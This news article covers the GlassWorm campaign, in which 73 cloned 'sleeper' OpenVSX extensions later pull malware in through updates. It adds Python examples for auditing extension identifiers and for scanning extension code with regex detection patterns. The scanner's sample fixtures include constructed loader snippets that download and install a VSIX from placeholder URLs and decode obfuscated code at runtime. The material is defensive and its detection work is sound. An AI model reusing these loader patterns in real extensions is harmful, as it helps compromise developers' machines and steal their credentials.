
GlassWorm malware returns via 73 OpenVSX sleeper extensions

OpenVSX sleeper – A new GlassWorm wave uses 73 “sleeper” OpenVSX extensions that look harmless on install, then deliver malware after updates—prompting urgent secret rotation and cleanup.

A fresh GlassWorm campaign is making its way back into developer workflows, this time through the OpenVSX ecosystem.

This new GlassWorm push involves 73 “sleeper” extensions—uploads that appear benign at first, but switch on later when updates arrive. Researchers say six have already been activated to deliver malware, while the rest are likely dormant or at least suspicious as the investigation continues.

What makes these OpenVSX “sleeper” extensions dangerous

The core trick is timing. When these extensions are first installed, they don’t immediately behave like malware. Instead, they hold back the real payload and then reveal the attacker’s intent later—often through an update cycle that’s routine for developers.

Misryoum's cybersecurity coverage notes that this pattern fits how earlier GlassWorm waves operated: the campaign is built to delay harm, so defenses that look only at install-time behavior struggle to catch it in time.

From invisible code to editor supply-chain attacks

GlassWorm is not a one-off incident. It is an ongoing supply-chain operation first observed in October, and it has already shown adaptability across multiple developer platforms.

Misryoum analysts describe how the campaign initially relied on stealth techniques such as invisible Unicode characters to conceal malicious logic. Over time, it expanded into other ecosystems—GitHub repositories, npm packages, and both the Visual Studio Code Marketplace and OpenVSX.

It has also been reported to target macOS users with trojanized crypto wallet clients, reinforcing that the end goals are broader than compromising a build step. The throughline is theft: cryptocurrency wallet data, developer credentials, access tokens, SSH keys, and information from local development environments.

Why the “clone” approach matters

In the latest wave, Misryoum coverage highlights that the 73 suspicious extensions are designed to look like legitimate offerings. Researchers say they are clones of existing or familiar listings, shaped to trick developers who glance mostly at the visuals (icons, names, and descriptions) rather than verifying publisher identity and the extension identifier.

One example described by Misryoum investigators involves the attacker using the same icon as a legitimate extension and aligning naming and description closely. Even where subtle differences exist, the important security takeaway is simple: the safest-looking extension can still be the wrong one.

In several cases, the differences are most noticeable in publisher details and the unique identifier—data that developers often ignore when they’re in a hurry to install something that “seems right.”
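To make that identifier check concrete, here is an added example (not code from the GlassWorm reporting or from any editor project) that audits an installed-extension inventory against an allowlist of approved identifiers. It assumes an inventory in the simplified shape of VS Code's extensions.json (a JSON list whose entries carry identifier.id as "publisher.name", a version and a display name); the allowlist entries, sample inventory and publisher names are constructed for illustration.

```python
"""Audit an editor's installed extensions by identifier, not appearance.

Added example, not code from the GlassWorm reporting or from any editor
project. It assumes an inventory in the simplified shape of VS Code's
extensions.json (a JSON list whose entries carry identifier.id as
"publisher.name", a version and a display name); the real file has more
fields, and OpenVSX-based editors such as VSCodium keep a similar one.
"""
import json

# Allowlist keyed on the exact identifier a team has approved.
# The entries are hypothetical.
ALLOWLIST = {
    "acme.yaml-tools": "YAML Tools",
    "acme.docker-helper": "Docker Helper",
}

# Constructed sample inventory: the approved extension, a clone that copies
# its display name under a lookalike publisher, and an unapproved one.
SAMPLE_INVENTORY = json.dumps([
    {"identifier": {"id": "acme.yaml-tools"}, "version": "2.1.0",
     "displayName": "YAML Tools"},
    {"identifier": {"id": "acme-tools.yaml-tools"}, "version": "2.1.0",
     "displayName": "YAML Tools"},
    {"identifier": {"id": "someone.random-theme"}, "version": "0.0.3",
     "displayName": "Random Theme"},
])


def audit(inventory_json, allowlist=ALLOWLIST):
    """Return {identifier: verdict} for every installed extension.

    Identifiers are compared case-insensitively, as VS Code does; display
    names are used only to spot lookalikes, never to approve anything.
    """
    approved = {ext_id.lower(): name.lower() for ext_id, name in allowlist.items()}
    by_name = {name: ext_id for ext_id, name in approved.items()}
    verdicts = {}
    for ext in json.loads(inventory_json):
        ext_id = ext["identifier"]["id"].lower()
        publisher = ext_id.split(".", 1)[0]
        display = ext.get("displayName", "").lower()
        if ext_id in approved:
            verdicts[ext_id] = "ok"
        elif display in by_name:
            # Same display name as an approved extension but a different
            # identifier: the clone pattern, usually visible only in the
            # publisher segment.
            expected = by_name[display]
            verdicts[ext_id] = (f"lookalike of {expected} "
                                f"(publisher {publisher!r}, expected "
                                f"{expected.split('.')[0]!r})")
        else:
            verdicts[ext_id] = "not on allowlist"
    return verdicts


if __name__ == "__main__":
    for ext_id, verdict in audit(SAMPLE_INVENTORY).items():
        print(f"{ext_id:28} {verdict}")
```

Run against a real inventory, the "lookalike" verdict is the one worth acting on first: it is exactly the case where icon, name and description all match and only the publisher segment of the identifier gives the clone away.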

How the payload lands after an update

Misryoum reports that these extensions act less like full malware bundles and more like thin loaders. Instead of containing the harmful code directly, they fetch it later and then install or execute it through editor-compatible mechanisms.

Researchers identified multiple delivery styles across variants. Some extensions retrieve an additional VSIX package from GitHub at runtime, then install it using the editor's command-line tooling.

Other versions load platform-specific compiled modules (the .node files) that contain the core logic. From there, they can fetch further payloads and perform installation routines for supported editors.

A third category relies on obfuscated JavaScript that decodes at runtime to pull down and install malicious extensions. Misryoum notes that these variants sometimes include encrypted data or fallback URLs, adding resilience if one retrieval path fails.
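The three loader styles above leave recognisable traces in an extension's JavaScript even when the payload itself is absent. The following added example (not code from the GlassWorm reporting) is a static triage scanner that flags those traces: a runtime VSIX fetch handed to a CLI installer, a native .node module carrying the logic, and JavaScript that decodes itself at runtime with a list of fallback URLs, plus the invisible-Unicode trick from earlier waves. The sample files, repository path and URLs are constructed, and the two-indicator threshold is an assumption; a single hit is normal in many benign extensions.

```python
"""Static triage of extension JavaScript for sleeper-loader indicators.

Added example, not code from the GlassWorm reporting. Sample files and
URLs are constructed; the review threshold is an assumption.
"""
import os
import re

INDICATORS = {
    # Style 1: fetch a VSIX and hand it to the editor's CLI installer.
    "vsix_install_cli": re.compile(r"--install-extension"),
    "vsix_artifact": re.compile(r"\.vsix\b"),
    "github_fetch": re.compile(
        r"https?://(?:raw\.githubusercontent\.com|github\.com)/\S+"),
    "child_process": re.compile(r"child_process|execSync\(|spawn\(|exec\("),
    # Style 2: core logic shipped as a platform-specific compiled module.
    "native_module": re.compile(r"require\(\s*['\"][^'\"]*\.node['\"]\s*\)"),
    # Style 3: code that decodes and runs itself at runtime.
    "runtime_decode": re.compile(
        r"Buffer\.from\([^)]*['\"]base64['\"]\s*\)|atob\(|\beval\(|new Function\("),
    # An array literal holding two or more URLs: a fallback list.
    "url_list": re.compile(
        r"\[\s*['\"]https?://[^'\"]+['\"]\s*,\s*['\"]https?://"),
    # Zero-width, variation-selector and Unicode tag code points that hide
    # logic in plain sight.
    "invisible_unicode": re.compile(
        "[\u200b-\u200f\u2060\ufeff\ufe00-\ufe0f\U000e0000-\U000e007f]"),
}

# Constructed sample sources: one benign extension and one of each loader style.
SAMPLE_FILES = {
    "benign.js": """
const vscode = require("vscode");
function activate(ctx) {
  ctx.subscriptions.push(vscode.commands.registerCommand("demo.hello",
    () => vscode.window.showInformationMessage("hello")));
}
module.exports = { activate };
""",
    "loader_vsix.js": """
const { execSync } = require("child_process");
const https = require("https");
const url = "https://raw.githubusercontent.com/example-org/example-repo/main/helper.vsix";
https.get(url, (res) => res.pipe(require("fs").createWriteStream("/tmp/helper.vsix"))
  .on("finish", () => execSync("code --install-extension /tmp/helper.vsix")));
""",
    "loader_native.js": """
const core = require("./bin/core-linux-x64.node");
module.exports = { activate: () => core.start() };
""",
    "loader_obfuscated.js": """
const k = Buffer.from("aHR0cHM6Ly8=", "base64").toString();
const fallbacks = ["https://example.invalid/a", "https://example.invalid/b"];
new Function("u", k + fallbacks[0])();\u200b
""",
}


def scan(files, review_threshold=2):
    """Return {filename: {"hits": [...], "verdict": ...}} for each source."""
    report = {}
    for name, source in files.items():
        hits = sorted(key for key, rx in INDICATORS.items() if rx.search(source))
        if not hits:
            verdict = "clean"
        elif len(hits) < review_threshold:
            verdict = "low"
        else:
            verdict = "review"
        report[name] = {"hits": hits, "verdict": verdict}
    return report


def scan_directory(root):
    """Scan every .js file under an extensions directory on disk."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            if n.endswith(".js"):
                path = os.path.join(dirpath, n)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    files[path] = fh.read()
    return scan(files)


if __name__ == "__main__":
    for name, result in scan(SAMPLE_FILES).items():
        print(f"{name:22} {result['verdict']:7} {', '.join(result['hits'])}")
```

Point scan_directory at the editor's extensions folder to triage a real install. The native-module case scores low on purpose: legitimate extensions ship .node binaries too, so that indicator only becomes interesting alongside a download or an install step.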

Misryoum also notes that its reporting does not include new technical details of the payload, but GlassWorm's history makes the likely objectives clear: credential and token theft, plus opportunistic access to developer systems.

What developers should do now

If any of these extensions were installed—even before researchers flagged the campaign—Misryoum recommends treating the machine as potentially exposed.

Misryoum’s guidance is pragmatic: rotate all secrets and clean the environment. That means replacing tokens, passwords, API keys, SSH credentials, and any other sensitive values that could have been accessed or exfiltrated.

Because the attack is built around delayed execution, “I installed it but nothing happened” isn’t a reliable conclusion. The loader can remain quiet until an update triggers the harmful stage.

Why this strategy is spreading across ecosystems

The key reason these "sleeper" extensions are effective is that they blend into normal developer maintenance. Updates to editor extensions are routine, and most workflows assume that updates improve functionality, not that they act as a trigger for a second-stage compromise. Disabling automatic extension updates in the editor and reviewing each update by hand removes that trigger, at the cost of some convenience.

Misryoum sees this as part of a wider trend in supply-chain attacks: rather than trying to smuggle everything into a single artifact, attackers increasingly split the operation into stages. A harmless-looking component buys time, reduces detection, and makes cleanup harder because investigators must connect the dots between initial install behavior and later-stage actions.

The fact that Misryoum’s reporting describes a mix of activated and dormant extensions suggests the attackers may be controlling rollout to manage visibility and reduce the chance of early shutdown.

The bigger risk: trust becomes the attack surface

GlassWorm’s return through OpenVSX is also a reminder of where modern risk concentrates: not in isolated systems, but in the tools developers rely on every day.

When an ecosystem’s extensions are easy to publish, search, and install, attackers don’t need to “break into” developer environments first. They can instead hijack trust—offering something that looks useful, then turning it into an entry point once it’s inside.

Misryoum will keep tracking the evolving list of affected extensions and how the campaign adapts as more updates appear.